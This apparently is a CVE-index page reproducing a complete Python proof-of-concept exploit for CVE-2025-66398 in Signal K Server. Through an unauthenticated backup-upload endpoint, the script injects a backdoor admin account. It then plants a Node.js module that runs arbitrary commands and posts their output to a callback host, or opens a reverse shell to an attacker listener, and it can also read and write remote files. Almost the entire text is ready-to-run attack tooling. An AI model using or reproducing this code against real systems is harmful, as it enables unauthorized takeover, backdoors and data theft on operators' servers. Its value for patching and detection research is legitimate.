5465 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / cve-2025-66398.py PY
#!/usr/bin/env python3
# CVE-2025-66398 — Signal K RCE via State Pollution → Config Hijacking → Backdoor
# Affected: Signal K Server ≤ 2.18.0
# Impact: Unauthenticated attacker can inject a backdoor admin account and achieve RCE
# Author: Joshua van der Poll (https://github.com/joshuavanderpoll)
# Repo: https://github.com/joshuavanderpoll/cve-2025-66398
import argparse
import base64
import http.server
import io
import json
import shlex
import socket
import sys
import threading
import time
import zipfile
from urllib.parse import urlparse

import bcrypt
import requests

BANNER = (
    "\033[95m"
    r"                ___ __ ___ ___      __   __ _______ ___ "
    "\n"
    r"  ____ _____ __|_  )  \_  ) __|___ / /  / /|__ / _ ( _ )"
    "\n"
    r" / _\ V / -_)___/ / () / /|__ \___/ _ \/ _ \|_ \_, / _ "
    "\\\n"
    r" \__|\_/\___|  /___\__/___|___/   \___/\___/___//_/\___/"
    "\n"
    r"                                                        "
)
GITHUB_URL = "https://github.com/joshuavanderpoll/cve-2025-66398"

DEFAULT_USER_AGENT = (
    f"Mozilla/5.0 AppleWebKit/537.36 (CVE-2025-66398; +{GITHUB_URL})"
)
DEFAULT_TIMEOUT = 10

DEFAULT_ATTACKER = "backdoor"
DEFAULT_PASSWORD = "H4CK1nd3x!"

RCE_MODULE_DIR = "cve-2025-66398-rce"
SIGNALK_TOKENSEC_PATH = (
    "/usr/local/lib/node_modules/signalk-server/dist/tokensecurity"
)

requests.packages.urllib3.disable_warnings(
    requests.packages.urllib3.exceptions.InsecureRequestWarning
)

_session = requests.Session()
_session.headers["User-Agent"] = DEFAULT_USER_AGENT
_session.verify = False
_timeout = DEFAULT_TIMEOUT
_target_os = "linux"
_signalk_dir_override = None


def _os_tokensec():
    """Path to the Signal K tokensecurity module on the target OS."""
    if _target_os == "windows":
        return (
            "C:/Users/signalk/AppData/Roaming/npm"
            "/node_modules/signalk-server/dist/tokensecurity"
        )
    return SIGNALK_TOKENSEC_PATH


def _os_data_dir():
    """Signal K user data directory on the target OS."""
    if _signalk_dir_override:
        return _signalk_dir_override.rstrip("/").rstrip("\\")
    return None


def _os_shell_spawn():
    """Return (binary, args_list) for the reverse-shell process on the target OS."""
    if _target_os == "windows":
        return "cmd.exe", []
    return "/bin/sh", ["-i"]


def _os_read_cmd(remote_path):
    """Shell command to read a file on the target OS."""
    if _target_os == "windows":
        return f"type {remote_path}"
    return f"cat {shlex.quote(remote_path)}"


def _os_write_cmd(content, remote_path):
    """Shell command to write content to remote_path on the target OS."""
    b64 = base64.b64encode(content.encode()).decode()
    if _target_os == "windows":
        safe_path = remote_path.replace("'", "''")
        return (
            f"powershell -NoP -NonI -W Hidden -C "
            f"\"[IO.File]::WriteAllBytes('{safe_path}',"
            f"[Convert]::FromBase64String('{b64}'))\" && echo written"
        )
    return (
        f"echo {shlex.quote(b64)} | base64 -d > {shlex.quote(remote_path)}"
        " && echo written"
    )


def ok(msg):
    print(f"  \033[92m[+]\033[0m {msg}")


def info(msg):
    print(f"  \033[94m[*]\033[0m {msg}")


def warn(msg):
    print(f"  \033[93m[@]\033[0m {msg}")


def err(msg):
    print(f"  \033[91m[-]\033[0m {msg}")


def prompt(msg, default=None):
    suffix = f" [{default}]" if default else ""

    try:
        val = input(f"  \033[96m[?]\033[0m {msg}{suffix}: ").strip()
    except (KeyboardInterrupt, EOFError):
        print()
        sys.exit(0)

    return val if val else default


def confirm(msg):
    try:
        ans = input(f"  \033[96m[?]\033[0m {msg} [y/N]: ").strip().lower()
    except (KeyboardInterrupt, EOFError):
        print()
        sys.exit(0)

    return ans in ("y", "yes")


def normalise_target(raw):
    raw = raw.strip().rstrip("/")

    if not raw.startswith("http"):
        raw = "http://" + raw

    return raw


def login(target, username, password):
    try:
        res = _session.post(
            f"{target}/signalk/v1/auth/login",
            json={"username": username, "password": password},
            timeout=_timeout,
        )

        if res.status_code == 200:
            return res.json().get("token")

    except requests.ConnectionError:
        pass

    return None


def _print_server_info(target, res):
    parsed = urlparse(target)
    info(f"Target         : {parsed.scheme}://{parsed.netloc}")
    info(f"Target OS      : {_target_os}")

    server_hdr = res.headers.get("Server") or res.headers.get("X-Powered-By")
    if server_hdr:
        info(f"Server header  : {server_hdr}")

    try:
        data = res.json()
        # Discovery endpoint: {"server": {"id": ..., "version": ...}, "endpoints": {...}}
        srv = data.get("server") or {}
        version = srv.get("version") or (
            (list(data.get("endpoints", {}).values()) or [{}])[0].get("version")
        )
        if version:
            ok(f"Detected version: Signal K Server {version}")
        srv_id = srv.get("id")
        if srv_id:
            info(f"Server ID      : {srv_id}")
    except Exception:
        pass


def check_reachable(target):
    try:
        res = _session.get(target, timeout=_timeout)
        _print_server_info(target, res)
        return True

    except requests.ConnectionError:
        err(f"Could not reach {target}. Is the server running?")
        sys.exit(1)

    except requests.Timeout:
        err(f"Timed out connecting to {target}.")
        sys.exit(1)


def do_check(target):
    info("Checking if target is vulnerable to CVE-2025-66398 ...")
    print()

    zip_buffer = io.BytesIO()

    with zipfile.ZipFile(zip_buffer, "w") as z:
        z.writestr(
            "security.json",
            json.dumps({"users": [], "devices": [], "immutableConfig": False, "acls": []}),
        )

    zip_buffer.seek(0)

    try:
        res = _session.post(
            f"{target}/skServer/validateBackup",
            files={"file": ("signalk-backup.backup", zip_buffer, "application/zip")},
            timeout=_timeout,
        )
    except requests.ConnectionError:
        err(f"Could not reach {target}.")
        sys.exit(1)

    if res.status_code == 200:
        ok("Target is VULNERABLE — /skServer/validateBackup accepts unauthenticated uploads.")
        try:
            data = res.json()
            restore_path = (
                data.get("restoreFilePath") or data.get("filePath") or data.get("path")
            )
            if restore_path:
                ok(f"restoreFilePath : {restore_path}")
        except Exception:
            pass
    elif res.status_code == 401:
        ok("Target appears PATCHED — endpoint requires authentication (HTTP 401).")
    else:
        warn(f"Unexpected response: HTTP {res.status_code}. Target may or may not be vulnerable.")

    print()


def do_pollute(target, attacker_name, attacker_pass):
    global _signalk_dir_override
    print()
    info("Phase 1 of 3 -- State Pollution")
    info(f"Backdoor account to inject  : {attacker_name}")
    info(f"Backdoor password to inject : {attacker_pass}")
    print()

    info("Hashing password with bcrypt ...")
    hashed = bcrypt.hashpw(attacker_pass.encode(), bcrypt.gensalt(rounds=10)).decode()

    zip_buffer = io.BytesIO()

    with zipfile.ZipFile(zip_buffer, "w") as z:
        security_config = {
            "users": [
                {
                    "username": attacker_name,
                    "password": hashed,
                    "type": "admin",
                }
            ],
            "devices": [],
            "immutableConfig": False,
            "acls": [],
        }
        z.writestr("security.json", json.dumps(security_config))

    zip_buffer.seek(0)

    info("Uploading malicious backup to /skServer/validateBackup ...")

    try:
        res = _session.post(
            f"{target}/skServer/validateBackup",
            files={"file": ("signalk-backup.backup", zip_buffer, "application/zip")},
            timeout=_timeout,
        )
    except requests.ConnectionError:
        err(f"Could not reach {target}. Is the server running?")
        sys.exit(1)

    if res.status_code != 200:
        err(f"Upload failed -- HTTP {res.status_code}: {res.text}")
        sys.exit(1)

    ok("Malicious zip accepted. Server restoreFilePath is now poisoned.")
    try:
        data = res.json()
        restore_path = data.get("restoreFilePath") or data.get("filePath") or data.get("path")
        if restore_path:
            ok(f"restoreFilePath : {restore_path}")
            if not _signalk_dir_override:
                # restoreFilePath is typically <datadir>/backups/tmp-xxx.backup or
                # <datadir>/tmp-xxx.backup — walk up until we leave a known sub-dir.
                norm = restore_path.replace("\\", "/")
                parts = norm.rsplit("/", 1)[0]  # strip filename
                _KNOWN_SUB = {"backups", "tmp", "uploads", "restore"}
                while parts and parts.split("/")[-1].lower() in _KNOWN_SUB:
                    parts = parts.rsplit("/", 1)[0]
                if parts and parts != ".":
                    _signalk_dir_override = parts
                    ok(f"Auto-detected data dir: {parts}")
        files = data.get("files")
        if files:
            ok(f"Accepted files  : {', '.join(files)}")
    except Exception:
        pass
    print()
    warn("-- Next step --")
    warn("  Trigger the restore as a logged-in admin (Phase 2), then")
    warn("  restart the server so it loads the new config.")
    warn("  Once the backdoor account is active, proceed to Phase 3 (RCE).")
    print()


def do_restore(target, admin_name, admin_pass):
    global _signalk_dir_override
    print()
    info("Phase 2 of 3 -- Config Hijacking via /restore")

    while True:
        info(f"Authenticating as admin: {admin_name}")
        token = login(target, admin_name, admin_pass)

        if token:
            break

        err("Admin login failed. Wrong username or password.")
        warn("  Hint: if you already ran the exploit earlier,")
        warn("        try the backdoor credentials you injected instead.")

        if not confirm("Try again with different credentials?"):
            sys.exit(0)

        admin_name = prompt("Admin username", default=admin_name)
        admin_pass = prompt("Admin password")

    ok("Admin login successful.")
    ok(f"Session token  : {token[:40]}...")
    info("Triggering restore endpoint with poisoned backup ...")

    headers = {"Authorization": f"Bearer {token}"}

    try:
        res = _session.post(
            f"{target}/skServer/restore",
            json={"security.json": True},
            headers=headers,
            timeout=_timeout,
        )
    except requests.ConnectionError:
        err(f"Could not reach {target}.")
        sys.exit(1)

    if res.status_code in (200, 202):
        ok("Restore triggered -- backdoor account written to disk.")
        try:
            data = res.json()
            restored = data.get("restored") or data.get("files") or data.get("written")
            if restored:
                ok(f"Restored files  : {restored}")
            cfg_path = data.get("configPath") or data.get("path")
            if cfg_path:
                ok(f"Config path     : {cfg_path}")
                if not _signalk_dir_override:
                    detected = cfg_path.replace("\\", "/").rsplit("/", 1)[0]
                    if detected and detected != ".":
                        _signalk_dir_override = detected
                        ok(f"Auto-detected data dir: {detected}")
        except Exception:
            pass
    else:
        err(f"Restore failed -- HTTP {res.status_code}: {res.text}")
        sys.exit(1)

    print()


def reboot_as_user(target, admin_name, admin_pass):
    info(f"Logging in as {admin_name} ...")
    token = login(target, admin_name, admin_pass)

    if not token:
        err("Login failed. Check credentials.")
        warn("  Hint: if the exploit already ran successfully, try the backdoor")
        warn("        username and password you injected in Phase 1.")
        return

    ok("Logged in.")
    info("Sending restart request ...")

    headers = {"Authorization": f"Bearer {token}"}

    try:
        res = _session.put(f"{target}/skServer/restart", headers=headers, timeout=_timeout)
    except requests.ConnectionError:
        err(f"Could not reach {target}.")
        return

    if res.status_code in (200, 202):
        ok("Restart request accepted. Waiting for server to come back up ...")
        _wait_for_server(target)
    else:
        err(f"Restart failed -- HTTP {res.status_code}: {res.text}")


def _wait_for_server(target, attempts=20, delay=2):
    for i in range(attempts):
        time.sleep(delay)

        try:
            _session.get(target, timeout=_timeout)
            ok("Server is back online.")
            return
        except Exception:
            print(f"  \033[90m[@]\033[0m Waiting ... ({i + 1}/{attempts})", end="\r")

    print()
    warn("Server did not come back within the timeout. Check it manually.")


def _command_js(callback_host, callback_port, command):
    return (
        "'use strict';\n"
        "var cp = require('child_process');\n"
        f"cp.exec({json.dumps(command)}, function(err, stdout, stderr) {{\n"
        "  var out = (stdout || stderr || (err ? err.message : '(no output)')).trim();\n"
        "  var http = require('http');\n"
        f"  var opts = {{hostname: {json.dumps(callback_host)}, port: {callback_port},\n"
        "    method: 'POST', path: '/',\n"
        "    headers: {'Content-Type': 'text/plain',\n"
        "              'Content-Length': Buffer.byteLength(out)}};\n"
        "  var req = http.request(opts, function() {});\n"
        "  req.on('error', function() {});\n"
        "  req.write(out); req.end();\n"
        "});\n"
        f"module.exports = require({json.dumps(_os_tokensec())});\n"
    )


def _shell_js(lhost, lport):
    shell_bin, shell_args = _os_shell_spawn()
    return (
        "'use strict';\n"
        "var net = require('net');\n"
        "var cp = require('child_process');\n"
        f"var sh = cp.spawn({json.dumps(shell_bin)}, {json.dumps(shell_args)});\n"
        "var c = new net.Socket();\n"
        f"c.connect({lport}, {json.dumps(lhost)}, function() {{\n"
        "  c.pipe(sh.stdin);\n"
        "  sh.stdout.pipe(c);\n"
        "  sh.stderr.pipe(c);\n"
        "  c.on('close', function() { sh.kill(); });\n"
        "});\n"
        f"module.exports = require({json.dumps(_os_tokensec())});\n"
    )


def _code_js(raw_code):
    return (
        "'use strict';\n"
        f"{raw_code}\n"
        f"module.exports = require({json.dumps(_os_tokensec())});\n"
    )


def _upload_rce_zip(target, attacker_name, attacker_pass, evil_js):
    hashed = bcrypt.hashpw(attacker_pass.encode(), bcrypt.gensalt(rounds=10)).decode()

    data_dir = _os_data_dir()
    if not data_dir:
        err("Signal K data directory is not set.")
        err("  Use -signalk-dir <path> or let Phase 2 auto-detect it.")
        err("  WARNING: a wrong path will corrupt the Signal K server config and service.")
        return False

    security_config = {
        "users": [{"username": attacker_name, "password": hashed, "type": "admin"}],
        "devices": [],
        "immutableConfig": False,
        "acls": [],
    }

    settings_config = {
        "security": {"strategy": f"{data_dir}/{RCE_MODULE_DIR}"},
    }

    zip_buffer = io.BytesIO()

    with zipfile.ZipFile(zip_buffer, "w") as z:
        z.writestr("security.json", json.dumps(security_config))
        z.writestr("settings.json", json.dumps(settings_config))
        # Directory entry — listSafeRestoreFiles allows directories unconditionally
        z.writestr(zipfile.ZipInfo(f"{RCE_MODULE_DIR}/"), "")
        z.writestr(f"{RCE_MODULE_DIR}/index.js", evil_js)

    zip_buffer.seek(0)

    try:
        res = _session.post(
            f"{target}/skServer/validateBackup",
            files={"file": ("signalk-backup.backup", zip_buffer, "application/zip")},
            timeout=_timeout,
        )
    except requests.ConnectionError:
        return False

    return res.status_code == 200


def try_rce(target, attacker_name, attacker_pass, admin_name, admin_pass, command):
    print()
    info("Phase 3 of 3 -- Remote Code Execution (security strategy injection)")

    # Grab a free ephemeral port for the callback listener
    with socket.socket() as s:
        s.bind(("", 0))
        callback_port = s.getsockname()[1]

    result = {"output": None}
    received = threading.Event()

    class _Handler(http.server.BaseHTTPRequestHandler):
        def do_POST(self):
            length = int(self.headers.get("Content-Length", 0))
            body = self.rfile.read(length).decode("utf-8", errors="replace")
            result["output"] = body
            self.send_response(200)
            self.end_headers()
            received.set()

        def log_message(self, *_):
            pass

    srv = http.server.HTTPServer(("", callback_port), _Handler)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    info(f"Callback listener started on port {callback_port}.")

    # Use host.docker.internal when targeting localhost (Docker Desktop)
    parsed = urlparse(target)

    if parsed.hostname in ("localhost", "127.0.0.1", "::1"):
        callback_host = "host.docker.internal"
    else:
        callback_host = parsed.hostname

    info(f"Callback host  : {callback_host}")

    info("Building and uploading RCE payload ...")

    js = _command_js(callback_host, callback_port, command)

    if not _upload_rce_zip(target, attacker_name, attacker_pass, js):
        err("RCE zip upload failed.")
        srv.shutdown()
        return False

    ok("RCE zip accepted by server.")

    # Try backdoor first, fall back to the supplied admin account
    token = login(target, attacker_name, attacker_pass)

    if token:
        restore_as = attacker_name
    elif admin_name:
        token = login(target, admin_name, admin_pass)
        restore_as = admin_name
    else:
        token = None

    if not token:
        err(
            "Cannot authenticate to trigger restore. "
            "Restart the server first (option 2), then retry."
        )
        srv.shutdown()
        return False

    ok(f"Authenticated as {restore_as}.")
    ok(f"Session token  : {token[:40]}...")
    info("Triggering restore with RCE payload ...")

    headers = {"Authorization": f"Bearer {token}"}
    restore_body = {
        "security.json": True,
        "settings.json": True,
        f"{RCE_MODULE_DIR}/": True,
    }

    try:
        res = _session.post(
            f"{target}/skServer/restore",
            json=restore_body,
            headers=headers,
            timeout=_timeout,
        )
    except requests.ConnectionError:
        err(f"Could not reach {target}.")
        srv.shutdown()
        return False

    if res.status_code not in (200, 202):
        err(f"Restore failed -- HTTP {res.status_code}: {res.text}")
        srv.shutdown()
        return False

    ok("Payload written to disk.")
    try:
        data = res.json()
        restored = data.get("restored") or data.get("files") or data.get("written")
        if restored:
            ok(f"Restored files  : {restored}")
        cfg_path = data.get("configPath") or data.get("path")
        if cfg_path:
            ok(f"Config path     : {cfg_path}")
    except Exception:
        pass
    info("Restarting server ...")

    # Re-authenticate — restore may have invalidated the old session
    token = login(target, attacker_name, attacker_pass)

    if not token and admin_name:
        token = login(target, admin_name, admin_pass)

    if not token:
        warn("Could not re-authenticate for restart. Restart the server manually.")
    else:
        headers = {"Authorization": f"Bearer {token}"}

        try:
            _session.put(f"{target}/skServer/restart", headers=headers, timeout=_timeout)
        except (requests.Timeout, requests.ConnectionError):
            pass  # restart disconnects the socket — expected

    _wait_for_server(target)

    info("Waiting up to 15 s for command output callback ...")
    got_it = received.wait(timeout=15)
    srv.shutdown()

    if got_it:
        print()
        ok("Command output received:")
        print("  " + "─" * 60)

        for line in (result["output"] or "").splitlines():
            print(f"  {line}")

        print("  " + "─" * 60)
        print()
        print(
            f"  \033[93m⭐ If this tool helped you, consider starring the repo: "
            f"\033[0m\033[1m{GITHUB_URL}\033[0m"
        )
        print()
        return True

    else:
        warn("No callback received within timeout.")
        warn(f"  Expected callback at: http://{callback_host}:{callback_port}/")
        warn("  The container may not be able to reach that address.")
        warn("  Check that host.docker.internal resolves inside the container,")
        warn("  or set a custom callback host via the code.")
        print()
        return False


def try_shell(target, attacker_name, attacker_pass, admin_name, admin_pass, lhost, lport):
    print()
    info("Phase 3 of 3 -- Reverse Shell (Node.js socket shell)")
    info(f"Listener       : {lhost}:{lport}")
    info(f"Catch with     : nc -lvnp {lport}")
    print()

    js = _shell_js(lhost, lport)

    if not _upload_rce_zip(target, attacker_name, attacker_pass, js):
        err("Shell zip upload failed.")
        return False

    ok("Shell zip accepted by server.")

    token = login(target, attacker_name, attacker_pass)

    if token:
        restore_as = attacker_name
    elif admin_name:
        token = login(target, admin_name, admin_pass)
        restore_as = admin_name
    else:
        token = None

    if not token:
        err(
            "Cannot authenticate to trigger restore. "
            "Restart the server first (option 2), then retry."
        )
        return False

    ok(f"Authenticated as {restore_as}.")
    ok(f"Session token  : {token[:40]}...")
    info("Triggering restore with shell payload ...")

    headers = {"Authorization": f"Bearer {token}"}
    restore_body = {
        "security.json": True,
        "settings.json": True,
        f"{RCE_MODULE_DIR}/": True,
    }

    try:
        res = _session.post(
            f"{target}/skServer/restore",
            json=restore_body,
            headers=headers,
            timeout=_timeout,
        )
    except requests.ConnectionError:
        err(f"Could not reach {target}.")
        return False

    if res.status_code not in (200, 202):
        err(f"Restore failed -- HTTP {res.status_code}: {res.text}")
        return False

    ok("Payload written to disk.")
    info("Restarting server — shell will connect back on module load ...")

    token = login(target, attacker_name, attacker_pass)

    if not token and admin_name:
        token = login(target, admin_name, admin_pass)

    if token:
        headers = {"Authorization": f"Bearer {token}"}

        try:
            _session.put(f"{target}/skServer/restart", headers=headers, timeout=_timeout)
        except (requests.Timeout, requests.ConnectionError):
            pass

    _wait_for_server(target)
    ok(f"Server back online. Shell should connect to {lhost}:{lport}.")
    return True


def try_code(target, attacker_name, attacker_pass, admin_name, admin_pass, raw_code):
    print()
    info("Phase 3 of 3 -- Code Injection (raw Node.js module)")
    print()

    js = _code_js(raw_code)

    if not _upload_rce_zip(target, attacker_name, attacker_pass, js):
        err("Code zip upload failed.")
        return False

    ok("Code zip accepted by server.")

    token = login(target, attacker_name, attacker_pass)

    if token:
        restore_as = attacker_name
    elif admin_name:
        token = login(target, admin_name, admin_pass)
        restore_as = admin_name
    else:
        token = None

    if not token:
        err(
            "Cannot authenticate to trigger restore. "
            "Restart the server first (option 2), then retry."
        )
        return False

    ok(f"Authenticated as {restore_as}.")
    ok(f"Session token  : {token[:40]}...")
    info("Triggering restore with code payload ...")

    headers = {"Authorization": f"Bearer {token}"}
    restore_body = {
        "security.json": True,
        "settings.json": True,
        f"{RCE_MODULE_DIR}/": True,
    }

    try:
        res = _session.post(
            f"{target}/skServer/restore",
            json=restore_body,
            headers=headers,
            timeout=_timeout,
        )
    except requests.ConnectionError:
        err(f"Could not reach {target}.")
        return False

    if res.status_code not in (200, 202):
        err(f"Restore failed -- HTTP {res.status_code}: {res.text}")
        return False

    ok("Payload written to disk.")
    info("Restarting server — injected code runs on module load ...")

    token = login(target, attacker_name, attacker_pass)

    if not token and admin_name:
        token = login(target, admin_name, admin_pass)

    if token:
        headers = {"Authorization": f"Bearer {token}"}

        try:
            _session.put(f"{target}/skServer/restart", headers=headers, timeout=_timeout)
        except (requests.Timeout, requests.ConnectionError):
            pass

    _wait_for_server(target)
    ok("Server back online. Code executed on module load.")
    return True


def restart_menu(target, attacker_name, attacker_pass, admin_name=None, admin_pass=None):
    while True:
        print()
        print("  \033[1mWhat do you want to do next?\033[0m")
        print("    1) Try exploit     (attempt RCE as backdoor user)")
        print("    2) Reboot as user  (trigger server restart via admin creds)")
        print("    3) Exit")
        print()

        try:
            choice = input("  \033[96m[?]\033[0m Choose [1/2/3]: ").strip()
        except (KeyboardInterrupt, EOFError):
            print()
            sys.exit(0)

        if choice == "1":
            cmd = prompt("Command to run on the server", default="id")
            succeeded = try_rce(
                target, attacker_name, attacker_pass, admin_name, admin_pass, cmd
            )

            if not succeeded:
                warn("RCE failed -- see hints above.")

        elif choice == "2":
            admin_name = prompt("Admin username", default=admin_name)
            admin_pass = prompt("Admin password", default=admin_pass)

            if not admin_name or not admin_pass:
                err("Username and password are required.")
                continue

            reboot_as_user(target, admin_name, admin_pass)

        elif choice == "3":
            info("Exiting.")
            sys.exit(0)

        else:
            warn("Invalid choice. Enter 1, 2 or 3.")


def interactive_mode(preset_target=None):
    global _signalk_dir_override
    print()

    if preset_target:
        target = normalise_target(preset_target)
        info(f"Target set to: {target}")
    else:
        raw = prompt("Target Signal K server")
        target = normalise_target(raw)
        info(f"Target set to: {target}")

    check_reachable(target)

    print()
    attacker_name = prompt("Backdoor username to inject", default=DEFAULT_ATTACKER)
    attacker_pass = prompt("Backdoor password to inject", default=DEFAULT_PASSWORD)

    print()
    info("Phase 1: State Pollution")
    info(f"  Uploads a malicious .backup file to {target}/skServer/validateBackup")
    info(f"  Embeds a backdoor admin account ({attacker_name}) into the restore state.")
    info("  No authentication required.")
    print()

    if not confirm("Continue with pollution?"):
        info("Aborted.")
        sys.exit(0)

    do_pollute(target, attacker_name, attacker_pass)

    print()
    info("Phase 2: Config Hijacking")
    info("  The server must restore from the poisoned backup and then restart")
    info("  before the backdoor account becomes active.")
    print()

    if confirm("Do you have admin credentials to trigger the restore now?"):
        admin_name = prompt("Admin username")
        admin_pass = prompt("Admin password")
        do_restore(target, admin_name, admin_pass)
        if not _signalk_dir_override:
            warn("Could not auto-detect the Signal K data directory from restore response.")
            print()
            err("  !! A wrong path will BREAK the Signal K server — it will fail to start !!")
            custom = prompt("Signal K data dir on target (required)")
            if not custom:
                err("Data directory is required to continue. Aborting.")
                sys.exit(1)
            _signalk_dir_override = custom
    else:
        admin_name = None
        admin_pass = None
        warn(
            "Waiting for a legitimate admin to trigger restore, "
            "or restart the server manually."
        )
        print()
        err("  !! A wrong path will BREAK the Signal K server — it will fail to start !!")
        custom = prompt("Signal K data dir on target (required)")
        if not custom:
            err("Data directory is required to continue. Aborting.")
            sys.exit(1)
        _signalk_dir_override = custom

    restart_menu(
        target,
        attacker_name,
        attacker_pass,
        admin_name=admin_name,
        admin_pass=admin_pass,
    )


def run_noninteractive(args, target):
    backdoor_name = args.backdoor_user
    backdoor_pass = args.backdoor_pass
    admin_name = args.admin_user
    admin_pass = args.admin_pass

    if args.check:
        do_check(target)
        return

    if args.shell and (not args.lhost or not args.lport):
        err("-shell requires -lhost and -lport.")
        sys.exit(1)

    needs_phase3 = any([args.read_file, args.write_file, args.command, args.code, args.shell])

    if admin_name and admin_pass:
        do_pollute(target, backdoor_name, backdoor_pass)
        do_restore(target, admin_name, admin_pass)
        reboot_as_user(target, admin_name, admin_pass)
    else:
        warn("No admin credentials provided — skipping Phases 1 and 2.")
        warn("  Use -admin-user and -admin-pass to run the full exploit chain.")
        warn("  Assuming backdoor account is already active from a previous run.")
        print()

    if needs_phase3 and not _signalk_dir_override:
        err("Signal K data directory is required for Phase 3 but was not set.")
        err("  Run Phase 2 first (auto-detects the path), or pass -signalk-dir <path>.")
        err("  WARNING: a wrong path will corrupt the Signal K server config.")
        sys.exit(1)

    if args.read_file:
        try_rce(target, backdoor_name, backdoor_pass, admin_name, admin_pass,
                _os_read_cmd(args.read_file))
    elif args.write_file:
        try_rce(target, backdoor_name, backdoor_pass, admin_name, admin_pass,
                _os_write_cmd(args.write_file[0], args.write_file[1]))
    elif args.command:
        try_rce(target, backdoor_name, backdoor_pass, admin_name, admin_pass, args.command)
    elif args.code:
        try_code(target, backdoor_name, backdoor_pass, admin_name, admin_pass, args.code)
    elif args.shell:
        try_shell(
            target, backdoor_name, backdoor_pass, admin_name, admin_pass,
            args.lhost, args.lport,
        )


def build_parser():
    parser = argparse.ArgumentParser(
        prog="exp.py",
        description="CVE-2025-66398 -- Signal K State Pollution -> Backdoor -> RCE",
        formatter_class=argparse.RawDescriptionHelpFormatter,
        add_help=True,
    )
    parser.add_argument(
        "-target",
        metavar="URL",
        default=None,
        help="Base URL of the Signal K server",
    )
    parser.add_argument(
        "-useragent",
        metavar="UA",
        default=DEFAULT_USER_AGENT,
        help="User-Agent header for all HTTP requests",
    )
    parser.add_argument(
        "-timeout",
        metavar="SEC",
        type=int,
        default=DEFAULT_TIMEOUT,
        help=f"Request timeout in seconds (default: {DEFAULT_TIMEOUT})",
    )
    parser.add_argument(
        "-target-os",
        metavar="OS",
        choices=["linux", "windows"],
        default="linux",
        help="Target server OS for payload/path adaptation: linux (default) or windows",
    )
    parser.add_argument(
        "-signalk-dir",
        metavar="DIR",
        default=None,
        help="Override the Signal K data directory on the target (default: OS-dependent)",
    )
    parser.add_argument(
        "-check",
        action="store_true",
        help="Test if the target is vulnerable without exploiting it",
    )
    parser.add_argument("-admin-user", metavar="USER", default=None, help="Admin username for Phase 2 restore")
    parser.add_argument("-admin-pass", metavar="PASS", default=None, help="Admin password for Phase 2 restore")
    parser.add_argument(
        "-backdoor-user",
        metavar="USER",
        default=DEFAULT_ATTACKER,
        help=f"Backdoor username to inject (default: {DEFAULT_ATTACKER})",
    )
    parser.add_argument(
        "-backdoor-pass",
        metavar="PASS",
        default=DEFAULT_PASSWORD,
        help=f"Backdoor password to inject (default: {DEFAULT_PASSWORD})",
    )
    parser.add_argument("-command", metavar="CMD", default=None, help="Execute a command on the server (non-interactive)")
    parser.add_argument("-read-file", metavar="PATH", default=None, help="Read a remote file via RCE")
    parser.add_argument(
        "-write-file",
        nargs=2,
        metavar=("CONTENT", "PATH"),
        default=None,
        help="Write CONTENT to PATH on the server via RCE",
    )
    parser.add_argument("-code", metavar="CODE", default=None, help="Inject raw Node.js code as the security module")
    parser.add_argument("-shell", action="store_true", help="Deploy a reverse shell (requires -lhost and -lport)")
    parser.add_argument("-lhost", metavar="HOST", default=None, help="Listener host for reverse shell")
    parser.add_argument("-lport", metavar="PORT", type=int, default=None, help="Listener port for reverse shell")

    return parser


def main():
    global _timeout, _target_os, _signalk_dir_override
    print(BANNER)
    print(f"  \033[95m\033[1m{GITHUB_URL}\033[0m")
    print()
    parser = build_parser()
    args = parser.parse_args()
    _session.headers["User-Agent"] = args.useragent
    _timeout = args.timeout
    _target_os = args.target_os
    _signalk_dir_override = args.signalk_dir

    non_interactive = any([
        args.check,
        args.command,
        args.read_file,
        args.write_file,
        args.code,
        args.shell,
    ])

    if non_interactive:
        if not args.target:
            err("-target is required.")
            sys.exit(1)
        target = normalise_target(args.target)
        check_reachable(target)
        run_noninteractive(args, target)
    else:
        interactive_mode(preset_target=args.target)


if __name__ == "__main__":
    main()